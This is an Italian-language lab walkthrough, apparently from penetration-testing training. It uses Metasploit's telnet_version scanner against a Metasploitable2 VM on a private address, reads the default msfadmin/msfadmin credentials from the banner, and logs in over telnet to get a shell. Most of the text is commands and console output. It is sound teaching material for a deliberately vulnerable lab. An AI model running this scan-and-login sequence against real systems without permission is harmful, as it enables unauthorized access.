

Exploit Telnet con Metasploit

Avvio Metasploit con il comando **msfconsole**.

[illegible]

Cerco l'exploit per quel servizio col comando **search telnet_version**. Scelgo l'exploit che ci dice la traccia, quindi il numero 1 usando il comando **use 1**.

```
msf6 > search telnet_version

Matching Modules
=====
#  Name                                                                 Disclosure Date  Rank  Check  Description
-  -                                                                 -
0  auxiliary/scanner/telnet/lantronix_telnet_version                normal      No     Lantronix Telnet Service Banner Detection
1  auxiliary/scanner/telnet/telnet_version                          normal      No     Telnet Service Banner Detection

Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/telnet/telnet_version

msf6 > use 1
msf6 auxiliary(scanner/telnet/telnet_version) >
```

Inserito l'exploit, con il comando **show options**, vedo le opzioni richieste, e setto l'rhost con il comando **set rhost**. Con il comando **show options** controllo che è tutto settato correttamente.

```
msf6 auxiliary(scanner/telnet/telnet_version) > show options
Module options (auxiliary/scanner/telnet/telnet_version):

  Name      Current Setting  Required  Description
  ---      -
  PASSWORD  no                no        The password for the specified username
  RHOSTS    yes              yes        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT     23               yes        The target port (TCP)
  THREADS   1                yes        The number of concurrent threads (max one per host)
  TIMEOUT   30               yes        Timeout for the Telnet probe
  USERNAME  no                no        The username to authenticate as

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/telnet/telnet_version) > set rhost 192.168.50.101
rhost => 192.168.50.101
msf6 auxiliary(scanner/telnet/telnet_version) > show options
Module options (auxiliary/scanner/telnet/telnet_version):

  Name      Current Setting  Required  Description
  ---      -
  PASSWORD  no                no        The password for the specified username
  RHOSTS    192.168.50.101  yes        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT     23               yes        The target port (TCP)
  THREADS   1                yes        The number of concurrent threads (max one per host)
  TIMEOUT   30               yes        Timeout for the Telnet probe
  USERNAME  no                no        The username to authenticate as

View the full module info with the info, or info -d command.
```

In questo caso il payload non è richiesto, quindi posso lanciare l'attacco con il comando **exploit o run**. Nella stringa si può leggere l'username e la password con i quali fare l'accesso, msfadmin/msfadmin.

```
msf6 auxiliary(scanner/telnet/telnet_version) > exploit
[*] 192.168.50.101:23 - 192.168.50.101:23 TELNET
to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametas
exploitable login:
[*] 192.168.50.101:23 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Infine mi collego alla telnet con il comando **telnet** seguito dall'ip della macchina vittima ed inserisco user e password per avere il controllo della macchina.

```
msf6 auxiliary(scanner/telnet/telnet_version) > telnet 192.168.50.101
[*] exec: telnet 192.168.50.101

Trying 192.168.50.101...
Connected to 192.168.50.101.
Escape character is '^J'.

metasploitable2

Warning: Never expose this VM to an untrusted network!
Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started

metasploitable login: msfadmin
Password:
Last login: Tue Jun 13 07:51:32 EDT 2023 on tty1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

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the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$
```

